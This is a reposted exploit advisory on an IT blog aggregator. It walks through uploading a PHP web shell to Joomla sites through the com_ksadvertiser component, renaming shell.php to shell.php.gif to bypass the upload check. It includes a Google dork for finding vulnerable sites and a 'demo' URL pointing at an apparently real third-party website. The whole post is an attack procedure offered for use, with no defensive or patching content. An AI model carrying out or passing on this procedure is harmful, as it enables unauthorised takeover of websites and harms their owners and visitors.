IT博客汇 | [EXP]Joomla com_ksadvertiser GetShell

[EXP]Joomla com_ksadvertiser GetShell

K8拉登哥哥发表于 2016-05-20 11:22:09
 ##########################
# Exploit Title: Joomla Advertiser Remote File & Bypass Upload shell
# Dork Google: inurl:index.php?option=com_ksadvertiser
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# vendor Link: http://www.kiss-software.de
# Tested on : Linux-Windows7
##########################

1.  Some pages require the Register
    Registrese Algunas Paginas lo exigen

   http://site/index.php?option=com_user&view=login
######################################
2.  Go to the upload path
    Dirijase a la ruta del upload


   http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

######################################

3.  Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
    Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif

#######################################

4.  Locate your file in the root / images/ksadvertiser/U0 -> this may vary
    Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar

    http://site/images/ksadvertiser/U0/403.php.gif

#######################################

Demo :

http://www.oekobaustoffe.com//index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en


##############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd [email protected] ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan